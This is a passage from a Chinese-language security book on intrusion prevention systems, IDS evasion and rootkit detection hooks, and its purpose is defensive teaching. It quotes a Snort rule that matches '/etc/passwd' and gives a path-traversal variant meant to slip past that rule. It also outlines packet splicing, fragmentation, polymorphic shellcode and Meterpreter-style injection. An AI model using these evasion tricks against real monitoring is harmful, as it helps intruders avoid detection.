在用户做出这个决定之后,专家系统将从用户的决定中学习,然后参考这个事件制作新的规则。最终,这种HIPS实施方法是最佳的,因为系统总体上可以自己推导出HKLM\Software\Microsoft\Windows\CurrentVersion\Run中是否有一个恶意软件添加的注册表项。这种基于专家系统的方法已经证明生成的假阳性较少。但是,当假阳性发生时,也足以让大部分管理员在一段时间里记住那种痛苦。假阳性可能导致对这个占用日常操作资源而什么也查不出来的系统失去信任。 与主要关注动态代码分析的基于特征码的扫描程序不同,基于行为的HIPS关注于发现和阻止一般的恶意行为和它们执行时所产生的事件。行为式系统寻找各种标志以及/或操作类型,例如文件/系统修改,未知应用程序/脚本启动,未知应用程序注册为自启动,动态链接库(DLL)注入,进程/线程修改以及分层服务提供者(LSP)安装。关注于这些领域是非常强大的安全方法,因为有无限的代码编写方法能够避开基于特征码工具发布的标准特征码集,但是恶意代码表现的方式是有限的。让我们来深入地观察每种方法,确定哪种方法提供更强大的恶意软件防范。 9.3.1 基于行为的系统 基于行为和基于特征码的安全应用程序之间有显著的不同,最终的结果也有很大的不同。两者的总体问题都与检测方法紧密相连;行为式安全使用已知应用程序的模式映射而特征码安全利用已识别的恶意软件执行进程的已知模式。这一过程足以在运行一段时间之后检测信任应用程序或者流氓应用程序中的反常行为。甚至在今天,一些默认的基于行为的引擎在恶意软件试图在受保护主机上写入或者执行时还工作得相当好。 基于行为的保护系统的弱点是对最终用户和企业安全管理员理解的依赖,以及对识别恶意软件行为的依赖。基于行为的系统的长处(前一节提到的关注领域)也是大部分合法应用程序的标准。理解事件的好坏可能很快地成为艰辛的过程,用户因为无尽的警告而沮丧,最终可能关闭该系统。幸好大部分行为式系统有默认的、已知的和许可的应用程序的白名单和黑名单,而且一般在企业内部或者通过容易获取的更新服务进行更新。 行为式系统的一个弱点是除非恶意软件执行被登记为恶意的操作,否则就无法识别。因此,即使行为式系统识别了恶意行为,破坏也可能已经产生。不止一种基于行为的识别系统利用专家系统和启发式方法,使用规则库和相关的严重程度权值进行工作。最终,基于行为的系统的固有弱点是有时候不能在恶意软件刚引入系统时发现它们,因为行为式引擎搜索的是恶意软件行为而不是特征码,而如果具有能够识别恶意软件的特征码就能更快地发现恶意软件。只要恶意软件不活动,行为式系统就不能发现,但是恶意软件执行时,就会因其行为而被发现。 我们不能忘记基于异常的监测系统,这一般用在业务网络上,在性质上仍然是基于规则的。简单地说,定义固有的规则以发现特定类型的通信模式行为。对手可以了解哪些规则“默认”安装以及/或者是“一般得到接受的安全方法”,从而再次使用信息安全业界的最佳实践来对付我们,开发恶意软件避开检测。这些混合系统被称为基于异常的入侵检测或者入侵检测/预防系统(IDPS)。仅仅依赖基于行为的系统是有缺陷的,尽管这些系统提供许多好处。记住,基于行为的系统的好坏取决于策略。开箱即用的默认策略没有足够的精确性来应付各种网络,所以定制策略很重要。 9.3.2 基于特征码的系统 安全社区中的大部分人都曾经对基于特征码的入侵检测系统提出负面的意见。这些系统确实有众所周知的弱点,但是也有长处。它们的长处主要是,通过标记文件中的代码或者数据的特定段落,用单一的特征码精确地识别著名的攻击方法和恶意软件。基于特征码的扫描程序也能在识别出特定的预定义特征码时识别恶意软件,而且能够清理之前未被感染的系统。特征码引擎是最容易实施和管理的,因为任何开源或者商业的IDS都有标准的特征码更新服务。基于特征码的引擎依赖部分的、精确的或者混合的匹配识别恶意软件;例如,系统可以识别一个文件名、SHA或者MD5 hash,这些可以匹配恶意软件本身。 也就是说,基于特征码的入侵检测系统有一个共同的弱点——不能发现系统没有特征码的任何恶意软件。相关的问题是无法有效地识别著名攻击和恶意软件的微小变种。攻击者可以很容易地用无数种方法修改现有的恶意软件,以绕过公开和/或私有的特征码集。下面是一些这种方法: ·修改简单的字符串,例如代码中的文本,像简单的字符串、代码注释或者不随功能改变的打印字符串。 ·十六进制编辑。 ·实现已知不被受害者的IDS供应商支持的打包程序。 ·实现相同攻击的替代传递方法。 ·采用简洁的技术,能够修改为IDS供应商所识别的特征码的各种方法。 ·定制开发的、在头几个发行版本之前多半无法检测的恶意软件。 恶意软件编写者可以在各种像virustotal.com和viruscan.jotti.org这样的网站上测试他们最新的毁灭装置被安全特征码发现的可能性。这些网站对于安全社区也很好用,可以识别和测试恶意软件样本。不利的一面是这些网站也被用来对抗安全社区。你的恶意软件样本可能对IDS或者IPS特征码进行测试,也可以测试防病毒特征码,这取决于使用的网站。 最终,基于特征码的引擎只能在事后或者攻击方法已经公开之后才能了解它们,因为特征码不能在这之前制作出来。这些特征码更新一般每周分发一次,这不会给用户带来任何好处,新的蠕虫可以在几个小时内传遍全球。前面的9.1节“HIPS体系结构”中提到,这些安全系统的作用仅仅取决于其配置及其在网络中的位置。 9.4 反检测躲避技术 IPS系统具有令人难以置信的高效率,因为它们是嵌入式的并且不需要解释网络栈。入侵预防系统能够轻易地清除TCP标志和会话中传递的传输信息——你希望确保的信息被剥落,以便更好地保护你的内部系统。剥落的信息包括操作系统、应用程序版本以及/或特定的内部协议设置。IPS还能够更正循环冗余校验和未分段的封包,以及可用于欺骗其他网络安全设备(如入侵检测系统和防火墙)的TCP排序方法。最重要的是,IPS对于现存的大量IDS躲避技术不敏感。我们将很快地着重介绍IDS领域的一些流行躲避技术。这些技术说明了具有恶意的人借以绕过网络保护,对安全监控人员保持隐蔽的途径。 基本字符串匹配弱点 这种方法是不引起保持警惕的安全管理员怀疑而躲避入侵检测系统的最简单方法。几乎所有入侵检测系统都在很大程度上依赖于基本字符串匹配。下面的IDS特征码是很早的SNORT特征码的一个例子,这种特征码是大部分基于特征码的系统的事实标准: alert tcp$EXTERNAL_NET any->$HTTP_SERVERS 80(msg:"WEB-MISC /etc/passwd";flags:A+;content:"/etc/passwd";nocase; classtype:attempted-recon;sid:1122;rev:1;) 这里,你可以简单地将etc/passwd改写为/etc/rc.d/../.\passwd来绕开它,实际上这是完全相同的路径;你只是把这个目录向上和向下各移动一次。精确字符串匹配的基本问题就是小的修改可以建立非常多的字符串,对这些变种你几乎总是必须生成不同的特征码。而且,使用正则表达式(REGEX)可能由于需要系统识别有效字符串和恶意字符串之间的区别而增加系统负载。 多态Shellcode 这种方法是非常新颖的,根据过去的恶意软件躲避技术,注入的方向有限(缓冲区溢出)。标准的IDS特征码检测依赖网络流量分析、协议分析以及这种方法所躲避的特征码匹配。多态Shellcode由K2开发,随ADMmutate发行。ADMmutate是用于混淆NOP sled和外壳代码检测的工具: ·NOP sled 是目前最古老但是最受欢迎的内存堆栈缓冲区溢出的执行技术。 ·Shellcode 是一个作为负载传递的代码片段,用于打开一个反向代码外壳,攻击者可以由此远程控制受害系统。 IDS系统一般能对NOP sled和shellcode特征码做出反应。ADMmutate使攻击者通过网络发送一个攻击,并且每次都使其有足够的差异,使得NIDS不能很容易地检测出来。 会话拼接 这种方法是一种低级的反IDS技术,用于将通常在一个封包中发送的数据分割以避免检测。例如,GET/HTTP/1.0可以被分割为多个封包:G,ET,/,HT,TP,/,1,.0。使用这种方法,恶意软件编写者可以避开NIDS。这种方法对于基于HTTP的会话很容易进行,因为这种会话是普通文本而且也可以依靠SQL查询来进行。 碎片攻击 这种方法将IP数据报分解为较小的封包,使其可以通过不同的网络信道或者媒体传输;受害者过后重组这些封包。NIDS具有某种形式的封包重组和比较的能力仅仅是前几年的事情。围绕封包重组的问题是,NIDS存储足以识别需要重组的封包同时继续监控网络的其他部分、并且重组每个发现的会话所需要的巨大开销。重组可能很快地使NIDS性能下降或者使其因超载而崩溃。 拒绝服务 这种形式的躲避可以以两种方式使用:对设备以及/或对管理设备的操作员。可用于对NIDS进行拒绝服务(DoS)攻击的工具包括:Stick,Snot,以及网上可以找到的许多其他工具。使用DoS技术进行IDS躲避的最常见目标是: ·引入过多的触发特征码的流量,使NIDS管理员无法识别哪些攻击是真,哪些是假阳性。 ·引入过多的记录信息,使物理存储资源完全被消耗,阻止NIDS记录更多的网络事件。 ·在网上引入足够的数据,消耗设备的处理资源,使NIDS无法看到其他网络会话。 ·引入NIDS上的软件或者硬件故障,以便完全将其锁定,直到重新启动为止。 对策:结合NIPS和HIPS 对于深度防御策略的一种很好的方法是,在你的企业中混合部署NIPS设备和HIPS主机。通过合并这些设备和主机,并且为你的网络安全设备(防火墙、IDS、内容过滤和管理等)建立中心报告机制,能够增强网络保护水平,这些设备的保护/阻止能力还能改善你的响应时间。尽管HIPS从事实上看很强大,它能够同样地分析加密和未加密通信,但是主机操作系统的加密/解密进程能使HIPS看到整个会话。具有了解会话级别信息的能力会使你在现代的攻击开始(如基于客户的攻击)时具备更多的控制能力。HIPS的缺点之一是对网络事件的迟钝,因为它只看到以自己的IP为目标的通信。实施了中心管理系统,安全管理员就能将整个网络的事件关联起来,从而弥补这一弱点。 NIPS对于阻止和保护整个网络的通信是很有效的。它能够发现各种网络事件,如主机扫描和恶意软件传播。当NIPS发现这种活动,它可以阻止并保护网络其余部分免遭侵害,同时还向你发出攻击的警报。IDS只能旁观,如果它能发现攻击,“可能”会警告你。但是,NIPS也有一个短处:它是一个在线的设备,可能遭到某种攻击而关闭,这实质上阻止了所有经过的流量。还要指出一点,NIDS或者NIPS不能像HIPS那样,在操作系统级别上发现攻击,所以组合这些系统,使它们能在管理和事件关联方面协同工作是很重要的。 9.5 如何检测意图 回答这个问题的能力多年来对企业安全型产品来说是“金砖”。安全业界确实能够识别意图的唯一方法是,在感染之后进行恶意软件的事后分析。在感染之后识别意图不是我们所需要的。发现恶意软件的意图已经超出了分析恶意软件的直接功能本身;这只是意图识别过程的第一阶段。 识别一个操作是否确实是用户驱动的或者用户驱动的功能(用户意图)是一件困难的任务。由于存在着操作系统、应用程序和后台服务,很难不产生许多假阳性。考虑到这些挑战,识别恶意软件意图极其困难。应用程序无法分辨用户驱动和恶意软件驱动的操作,因为最常见的应用程序共享执行相似任务的后台功能。为了识别意图,询问如下问题: ·你如何检测恶意软件意图——在执行时或者通过执行? ·在识别意图的推理模型中哪些操作有用? ·你使用什么工具或者方法检测意图? 下面是一些识别或者推断用户操作和恶意软件操作之间差异的一些简单概念: ·用户可能通过调用explorer.exe进程的一个快捷方式启动浏览器(Internet Explorer、Firefox、Opera等)。从这个角度看,你可能推断这是用户启动的行为,直接应用程序调用则相反。 ·系统可以识别一个网络IP是不是通过直接网络调用和/或通过用户启动的一个进程进行连接的。例如,一个指向www.myspace.com/maliciousprofile的连接是通过浏览器内的一个鼠标单击还是从与浏览器无关的进程中生成? 重要的是,鼠标或者用户启动的活动以及这些活动相关的进程行为。恶意软件中,直接进程请求一般不需要实际地在一个可信进程中运行。但是,有一些攻击工具可用于将恶意软件直接注入到进程中以避免被发现。 Meterpreter就是这样的工具,它是Metasploit框架的一个插件。Meterpreter能够通过不在进程表中创建新的进程来避免检测,这通常是恶意软件或者主机入侵的确凿证据。Meterpreter实际上在它所利用的进程(一般是系统级别服务)中注入一个额外的线程。这样,它不必要使用chroot(修改文件权限的Unix命令)或者修改进程的任何权限而触发HIPS。这只是用于绕过检测的一组工具中的一个例子。 恶意软件意图可以通过分析每个恶意软件操作的输出或者结果来发现。为此,主机必须允许恶意软件运行或者运行于系统上一个虚拟的沙箱而使之无害。虚拟沙箱的设计使一个位置或者不信任的程序可以运行在一个隔离的环境中,不访问计算机文件或者网络,以及/或系统设置。CWSandbox(可从http://www.cwsandbox.org/上订购)这样的工具使安全分析人员能够从一个虚拟沙箱中运行可疑的恶意软件,确定该文件是否恶意并且测试文件的未知恶意内容或者行为。 允许恶意软件为分析目的而运行能让你确定恶意软件的功能及其配置。推断出的最终的目标可能是身份盗窃、欺诈或者单纯的传播;知道这一情况可以帮助你更好地理解恶意软件的意图。接下来,管理员更好地理解对企业的威胁,而安全团队能够在合适的位置安排保护。 9.6 HIPS和安全的未来 在过去的10年中,防病毒公司慢慢地失去越来越多的发现恶意软件变种和自制产品的能力。但是现在,防病毒公司慢慢地将基于HIPS的模块组合到产品中。例如,Symantec在Symantec Endpoint Security客户端中包含了主动威胁保护(Proactive Threat Protection)模块。其他主要供应商如McAfee、Computer Associates和Trend Micro也有自己的HIPS模块。HIPS产品也正被用在主要的企业中。美国军队已经授权McAfee的ePO为其基于主机的安全系统(HBSS),2011年这个系统将被部署到整个国防部网络(NIPRNET)。 HIPS产品本身不是抵抗所有网络威胁的银弹,只是用于防护网络的另一个工具,它们既可以操作于主动防护(阻止)也可以操作于被动(仅发出警告和报告)模式,而且它们还能识别和阻止实际攻击,而不只是像NIDS那样空转和发出警告。随着企业的急剧增长,预算变得更加紧张,使用IPS解决方案提供功效变得更有成本效益。我们并不是说IPS解决方案能够代替安全工程师,因为终究要有人验证自动化系统的策略、操作和输出。安全引擎也需要进行干预,以便识别、分析、搜集证据,并且验证真正的攻击,操作和维护安全型系统。 IPS解决方案最出色的部分是,你可以在网络中的任何地方对其进行分层: ·你可以将IPS解决方案部署在客户端和服务器端的网段之间,使用主动防护模式,这将保护你的服务器、关键公司服务以及数据与用户分离(用户是每个管理员的祸患)。 ·你可以为整个服务器LAN部署一个NIPS,或者在每个服务器上部署一个HIPS。两种解决方案都有效;你的选择取决于预算以及你对NIPS意外地阻止用户访问关键服务的疑问。 ·你可以在Web服务器和互联网之间部署一个IPS。用这种方法,你将具有在线防护(实际上不为对手所见),这个IPS工作于主动防护模式,能够保护你的Web应用——在互联网上最常遭到攻击的系统(一般通过SQL注入和XSS攻击)。 现在基于网络和主机的安全应用程序在功能上正在趋向一致。我们开始看到防火墙、防病毒、应用程序防御、内容管理和入侵预防技术全都合并成为一种“网络安全大杂烩”。提供混合的核心安全技术的解决方案在多年以后将会超过单独的解决方案;现在,供应商正在创建打包了整套安全解决方案的合并解决方案。有很多供应商能够提供你正在寻求的入侵预防服务。在2004年,Gartner宣称“IDS已死,IPS万岁”,掀起了IPS热潮,从此这种声浪越来越大。今天,在社区中能够得到更多的IPS解决方案——既有基于主机的,也有基于网络的。 9.7 小结 如果你希望避免恶意软件的爆发,应该在企业体系结构中实施一个IPS解决方案。我们的建议是,在你的关键或者操作性的服务器端和客户端网段之间以及互联网和你的Web停火区(DMZ)之间部署嵌入式的NIPS。在你的客户工作站上部署健壮的HIPS也能显著地增强你在保护企业免遭恶意软件侵害时的整体安全态势。在你的企业中评估公司资产始终是很重要的,不管这些资产所承担的是什么角色。这有助于你正确地部署基于主机和网络的保护,并且能为你的企业提供最佳的保护范围。 第10章 Rootkit检测 笃,笃,一个客人正在敲你的房门。你打开门告诉客人说“这里没人”。客人说“好的”,然后离开。这是不是很奇怪?是的,这是Rootkit检测的一个隐喻。你明白Rootkit检测是种矛盾。如果Rootkit正常地进行着自己的工作,它就能完全控制操作系统或者应用程序,那么应该也就能对试图发现它的任何程序保持隐蔽。 举个例子,大部分的内核Rookit应该能够阻止每一种操作于用户空间的Rootkit检测技术正常工作,因为内核控制着传递到用户控件的数据。如果Rootkit检测程序作为常规的用户应用程序而试图扫描内存,在内核中运行的Rootkit能够发现这一情况并且提供虚假的内存让其分析(例如,告诉Rootkit检测程序“没有人在家”)。这一点看上去容易,但是实际上对于Rootkit作者来说,实施反Rootkit检测功能比编写Rootkit本身要难得多。缺乏可用的源代码、Rootkit检测工具的数量以及时间都是使反Rootkit检测功能很少出现的因素。实现反Rootkit检测功能如此复杂和困难这一事实有利于好人——白帽——因为大部分时候我们能够赢得这一战役,检测并且删除Rootkit。 10.1 Rootkit作者的悖论 Rootkit有趣的一点是,从天性上讲,它们是自相矛盾的。Rootkit作者对自己编写的每个Rootkit都有两个核心需求: ·Rootkit必须保持隐蔽。 ·Rootkit必须运行在它所感染的主机相同的物理资源之上;换句话说,主机必须执行这个Rootkit。 这两个需求形成了矛盾。如果OS或者进程/机器(在虚拟Rootkit的情况下)必须知道Rootkit的情况才能执行它,那么Rootkit怎么保持隐蔽?答案是:Rootkit在大部分情况下无法保持隐蔽。 你必须记住,Rootkit检测和所有恶意软件检测类似,是一种军备竞赛,这种竞赛由敌我双方的需要推进。现在,正如本书中写到的,Rootkit检测(好人)这一方取得胜利。有许多新的防Rootkit应用程序和Rootkit检测技术可供公众使用;然而,每种Rootkit检测应用程序都需要相当的技术知识才能操作,而商业供应商通常考虑的是使软件易用,而没有真正赶上最新的Rootkit检测技术。 10.2 Rootkit检测简史 在每个军备竞赛中,知道你曾经的足迹,以此来理解将来的去向是很重要的,所以介绍一下Rootkit检测的简史是合理的。寻找Rootkit的第一次尝试不包括检测,而是预防。防Rootkit技术关注于阻止恶意的内核驱动程序或者用户空间应用程序执行或者被操作系统装入。当然,在Rootkit作者开始分析应用程序阻止Rootkit装入的方法并且开发出新的装入方法之前,这种方法是有效的。 例如,完整性保护驱动程序(Integrity Protection Driver,IPD)阻止内核模式Rootkit通过挂钩系统服务调度表(SSDT)中的函数NtOpenSection和NtLoadDriver装入,并且确保只有预先确定的驱动程序能够调用这些函数。如果不在预先确定的列表中的Rootkit试图装入,其将被阻止。 这种方法有两个固有的问题。首先,它依赖“清晰”或者“纯净”的基线来建立预先确定的允许启动程序列表。其次,Rootkit开发者如Greg Hoglund发现了使用ZwSetSystem-Information装入驱动程序绕开IPD的方法。IPD作者立即更新了他们的工具,但是许多新的绕开IPD的方法持续发布,现在,这个工具已经相对没有效果了。 IPD用于阻止未知或者未许可软件装入的方法是采用许多个人防火墙公司使用的白名单技术。白名单技术的所有问题在IPD和类似IPD的应用程序中也很明显。白名单方法的一个主要问题是,检测应用程序必须挂钩或者分析未知的内核驱动程序(也就是Rootkit)用于装入的所有可能的入口点。最新版本的IPD具有超过8个不同的入口点,还不包括这8个入口点所连接的用例。例如,注册表可用于装入基于内核的Rootkit。但是,注册表使用符号链接,一个名称实际上引用另一个名称,以此来启用某个功能;这意味着白名单应用程序必须知道注册表中的HKEY_LOCAL_MACHINE和内核中的名称不相同。内核将接受\Registry\MACHINE。需要监控的位置数量是可能的注册表/文件系统符号链接数量乘以入口点数量,由此你可以看到对于一个防Rootkit开发人员来说这是多么令人畏缩的任务! 之后出现的一种新型白名单和现有技术有相同的问题,但是要精确得多,这就是加密签名。在这种技术中,内核被要求执行一个进程,但是在执行之前,内核使用一个秘钥凭证验证进程中的唯一秘钥正确。和你的Web浏览器中的SSL加密相似,这种技术实际上不允许任何未知的应用程序访问计算机硬件,从而使恶意软件甚至不能运行! 因为白名单方法非常费时,开发人员转向可靠的方法——基于特征码的检测。许多最早公开的Rootkit,甚至一些当今的Rootkit都很容易通过特征码检测。基于特征码的检测过程是:应用程序存储一个字节数据库、字节串以及字节组合,当在一个二进制文件中发现这些时,就将二进制文件标记为恶意的。例如,如果二进制文件的第1145字节包含十六进制串0xDEADBEEF,那么这个二进制文件可能被看做是恶意的。虽然这种方法很简单,但是在许多年里都是主要的防病毒和防Rootkit的检测方法。而头几个特征码系统是依赖文件系统中的文件特征码匹配的防病毒技术的扩展,新技术使用内存特征码来识别在系统上执行的恶意代码。这一过程对于公开的Rootkit相当有效,因为分析人员可以获得这些Rootkit的二进制代码,以此来建立可供评估的特征码。私有、定制的Rootkit将不会被基于特征码的系统发现。 在基于特征码的系统开始被绕过时,一组新的方法开发出来。这组方法常常被称作交叉视图(cross-view)或者污染视图(tainted view),目前大多数Rootkit检测应用程序都使用这种新技术。污染视图方法比较系统的不同快照,例如运行中的进程类型、机器上安装的硬件或者执行特定系统任务所需要的函数名称和数量,并且发现这些快照产生差异的地方。这种方法的前提是一种方式执行的数据视图应该与系统上存在Rootkit时的不同执行方式的数据视图不同。用户所看到的视图被认为是受污染的视图(tainted view),而硬件所看到的视图被认为是干净或者可信的视图。例如,Rootkit检测程序根据用户空间API取得一个当前运行的进程快照;这是一个受污染视图。然后检测程序根据内核中控制进程执行的内部线程结构取得一个运行进程的快照;这是一个干净的视图。接下来,Rootkit检测程序比较这两个快照,生成一个在干净视图中却未在污染视图中出现的进程列表。这些进程被认为是隐藏的,因此它们是恶意的,应该受到Rootkit检测程序操作者的调查。图10-1说明了这种比较。 不管是比较文件、进程、注册表键值、内存中的结构,甚至操作系统内部使用的内存区域,污染视图方法都有效。当这种方法刚刚开发出来时,它是非常强大的并且发现了许多Rootkit。几乎所有目前可用的Rootkit检测程序都采用污染视图方法作为发现Rootkit的主要方法。各种Rootkit检测程序之间的不同是,用于实现干净视图的方法以及检测程序用于确保干净视图或者检测程序本身不会遭到篡改的步骤。我们称这种方法为污染视图方法,其他人称之为交叉视图或者干净/非干净视图(clean/un-clean view)方法,无论如何,方法都一样。 然而,污染视图方法也有一些Rootkit可以利用的缺陷。污染视图概念是根据以下假设进行工作的:低级的干净视图将会报告不同的数据,以及Rootkit不能控制产生干净视图的技术性进程返回的数据。从第4章和第5章中,你可以了解到高级的Rootkit,例如内核Rootkit和虚拟Rootkit,实际上控制了除系统中处理事件的实际安排之外的一切,并且能够向用户模式的应用程序返回任何类型的数据。 图 10-1 污染视图与干净视图的比较 前面已经讨论过,有许多方法在内核或者用户模式中与Rootkit挂钩。下面是一些我们讨论过的方法: ·系统管理程序 ·系统服务调度表(SSDT) ·嵌入函数钩子(detours) ·I/O请求包(IRP)处理程序 ·系统自举装入程序 上述每种技术都有各种问题,使得实施污染视图检测方法时难易各异。 首先采取污染视图方法的Rootkit检测工具之一是Joanna Rutkowska开发的Patchfinder。Patchfinder假定大部分Rootkit必须扩展或者修改一个执行路径以达到它们的目标。比如,操作系统为打开文件所执行的标准函数是kernel32.OpenFile(),然后是ntdll.NtOpenFile(),接着切换到内核函数ZwOpenFile。Patchfinder首先统计执行这一操作需要的指令数量,然后试图检测内核驱动程序中特定函数执行路径中的变化,因为指令数量的增加是Rootkit安装在系统上的一个很好的标志。 回到我们的例子,如果kernel32.OpenFile()有钩子,Rootkit添加了128个字节的指令,那么Patchfinder会发现执行路径的大小不同,并且发出机器可能受到侵害的警告。Patchfinder在系统自举时对所有内存中的内核驱动程序进行基准测试,计算每个驱动程序具体执行路径中包含的指令数;这常被称为执行路径分析。Patchfinder使用CPU中的调试寄存器查看每条执行的指令来进行这一分析。这种调试技术常常称为单步(single step),常用于开发人员测试软件。Patchfinder接着定时地重新扫描系统,比较基准测试时记录的指令数量和最后扫描得到的数字。这种方法工作得相当不错,但是因为Windows是一个动态的可以通过使用文件系统过滤器驱动程序和网络驱动程序(如防火墙)扩展的操作系统,也可能出现未安装Rootkit而执行路径变化的合理情况。为了应对这种情况,Patchfinder使用统计来确定额外的指令是否合理。统计方法是有效的,但仍然有假阳性,而且有些Rootkit能够轻易地击败Patchfinder,当这些Rootkit被跟踪或者处于“单步调试”状态时,能检测到一个开发人员用于走查程序或者驱动程序执行的每条指令的进程。 10.3 检测方法详解 在我们研究可用于检测Rootkit的工具和应用程序之前,希望花费一些时间解剖各种工具如何实现污染视图检测,以对抗Rootkit开发人员的许多钩子方法。为了学习如何使用这些检测方法编写自己的Rootkit检测程序,可以参见附录,我们在那里为大家说明了开发自己的Rootkit工具的整个过程。在本章中,我们有意地保持最少的编程代码,以便阐述概念,而不仅仅是用源代码填满整个页面。如果你希望直接研究源代码,阅读本节后再参看附录。 10.3.1 系统服务描述符表钩子 最简单和最常用的技术之一——系统服务描述符表(SSDT)钩子,很容易发现,几乎每种工具都能检测SSDT钩子。在第4章中,我们讨论了SSDT钩子的工作原理,并且提到了SSDT钩子成为最常用的方法只是因为容易实现。Windows内核维持一张输出给驱动程序使用的所有函数的表格。Rootkit作者只需要找到这张表以及GUI子系统所使用的影子版本,替换表格中的指向内核函数实际位置的指针为Rootkit的内核函数版本。KiServiceTable存储该表格中的所有内核函数的地址。例如,如果你使用WinDBG查看正常的KiServiceTable的结构,就会注意到一个趋势: kd>dps nt!kiServiceTable L11c …… 804e2dac 8056b553 nt!NtCreateEvent 804e2db0 80647bac nt!NtCreateEventPair 804e2db4 8057164c nt!NtCreateFile 804e2db8 80597eed nt!NtCreateIoCompletion 804e2dbc 805ad39a nt!NtCreateJobObject …… 你可以看到所有函数普遍处于0x80000000的范围。现在,看看安装一个使用SSDT钩子的Rootkit后会发生什么: kd>dps nt!kiServiceTable L11c …… 804e2dac 8056b553 nt!NtCreateEvent 804e2db0 80647bac nt!NtCreateEventPair 804e2db4 f985b710 Rootkit+0x8710 804e2db8 80597eed nt!NtCreateIoCompletion 804e2dbc 805ad39a nt!NtCreateJobObject …… 你可以看到原来位于0x8057164c地址的nt!NtCreateFile已经被具有调试程序无法解析的新地址的一个函数所替代。新地址是0xf985b710,这是十进制4 186 289 936的十六进制记法。这个地址绝对不会落在0到0x80000000(2 147 483 648)范围内。 大部分挂钩SSDT的程序都使用这一简单的逻辑,寻找该表中正确地映射到ntoskrnl.exe找到的地址的最低和最高指针值,如果该表中的一个函数指针地址落到这个范围之外,你就得到了该函数带有钩子的一个很好的指示。 10.3.2 IRP钩子 检测IRP钩子的方法和检测SSDT钩子相同。每个驱动程序输出一组28个处理I/O请求包的函数指针。这些函数存储在驱动程序的DRIVER_OBJECT中,而每个函数指针都可以被另一个指针替代。正如你所能猜到的,这意味着DRIVER_OBJECT所起的作用和KiServiceTable非常相似。如果你扫描DRIVER_OBJECT并且比较每个函数指针地址,了解该地址是否落在驱动程序地址范围之内,就能确定函数指针是否与特定的IRP挂钩。 10.3.3 嵌入钩子 嵌入钩子(inline hooking)或称detours,是用其他指令取代函数头几个导致跳转到Rootkit函数的过程。这种方法比替换函数指针地址更可取,因为你可以看到后者多么容易被发现。尽管这种方法更好,但是这种钩子不总是很容易做到,有时甚至不可能。然而,检测函数是否被绕过和检测SSDT钩子的过程相同。 防Rootkit工具将装入一个包含可能被挂钩的函数的二进制程序,并且存储该函数的指令。一些Rootkit检测防护工具将仅仅分析头几个字节,以加快速度。一旦存储了真实函数的指令,装入内存的指令与真实的函数指令进行比较。如果两者之间有任何不同,就表示该函数可能被绕过。 10.3.4 中断描述符表钩子 中断描述符表(Interrupt Descriptor Table,IDT)的挂钩和SSDT及IRP钩子方法相同。这个表格有一组每个中断的函数指针。为了挂钩中断,Rootkit用自己的函数替换中断。 10.3.5 直接内核对象操纵 直接内核对象操纵(Direct Kernel Object Manipulation,DKOM)是独特的钩子方法,因为作者操纵内核中可能在Microsoft发行的不同服务包甚至补丁之间可能改变的对象。检测修改过的内核对象要求对检测对象类型的理解。例如,Rootkit将频繁使用DKOM,通过调整EPROCESS结构将希望隐藏的进程从列表中删除,从而隐藏进程。 为了检测使用DKOM隐藏的进程,你必须查看所需信息可能存储的其他位置。例如,操作系统通常有超过一个存储信息(例如进程、线程等)的位置,因为操作系统的许多不同部分需要这些信息。因此,如果Rootkit作者仅仅从EPROCESS列表中删除进程,防Rootkit作者就可以检查PspCidTable并且比较两个列表的进程ID,寻找不同之处。 10.3.6 IAT钩子 钩子不仅发生在内核模式。用户模式钩子常常出现并且很容易实现。更加著名的一个用户钩子是IAT钩子。IAT钩子检测很简单。首先,Rootkit检测程序找到进程需要的DLL的列表。对每个DLL,检测程序都装入DLL,分析输入的函数,并且存储这些DLL函数的输入地址。然后,Rootkit检测程序比较地址列表和被检查进程中所有DLL使用的输入地址。如果检测程序发现两者之间有任何差异,就表明输入的函数可能带有钩子。 10.4 Windows防Rootkit特性 Windows确实有其缺陷,但是所幸的是,从Windows XP Service Pack 3、Vista到Windows 7,Microsoft在操作系统的安全和稳固上投入了许多资源。实际上,Microsoft甚至拥有http://blogs.msdn.com/si_team/上的一个系统完整性团队博客。2005年,Microsoft发布了一套新的技术,支持更先进的系统完整性。这些技术是: ·安全开发生命期(Secure Development Lifecycle,SDL) Windows Vista是Microsoft发行的第一个使用SDL的操作系统,SDL实际上是对Microsoft的软件工程过程的一个修改,组合了必需的安全过程。 ·Windows服务加固(Windows service hardening) Microsoft声称使用受限的特权运行更多核心服务,所以如果恶意软件或者Rootkit接管这个服务,操作系统将会阻止特权的提升。 ·No-execute(NX)和地址空间随机分配(Address Space Layout Randomization,ASLR) 这两种技术的加入主要是帮助预防缓冲区溢出——这是Rootkit有时使用的一种攻击技术。 ·内核修补保护(Kernel Patch Protection,KPP) 更常被称为PatchGuard,阻止程序修改内核或者内核数据结构,例如SSDT和IDT。这种开发是对Rootkit作者的重大打击,而对防病毒供应商也一样。KPP仅实施于64位系统。 ·强制驱动程序签名 在64位系统上,所有内核模式驱动程序必须有得到认可的机构的数字签名,否则将不会被内核装入。 ·BitLocker驱动程序加密 主要考虑全磁盘加密解决方案,Microsoft还将其看做整体系统完整性的一个部分,因为它拥有与硬件TPM中存储的一个可信密钥通信的操作方式。 ·Authenticode Microsoft 引入这个应用程序签名服务,允许供应商签署其应用程序,这样内核可以在运行时检查所提供的hash,确保与Authenticode签名匹配。 ·用户账户控制(User Account Control,UAC) 这种技术为常规用户应用业界的最佳实践,例如最少特权和受限角色。 ·软件限制策略 这个术语对于企业中通过组策略进行的软件控制来说是很精巧的。简单地说,如果在组策略中,管理员不许可在系统上安装软件的某个部分,该软件就不会被安装。 ·Microsoft恶意软件删除工具(Microsoft Malicions Software Removal Tool,MSRT) 这是Microsoft的防恶意软件产品,使用传统的特征码检测技术。 ·Internet Explorer 7 IE7中加入了多种安全改进,包括对加载项的完全控制、IE保护模式、仿冒网站过滤器,以及内建的防间谍软件。 Microsoft引入这些技术是其历史上的一个里程碑,因为它们代表着对直接处理Rootkit、恶意软件以及操作系统安全的第一次重大的资源和市场投入。 10.5 基于软件的Rootkit检测 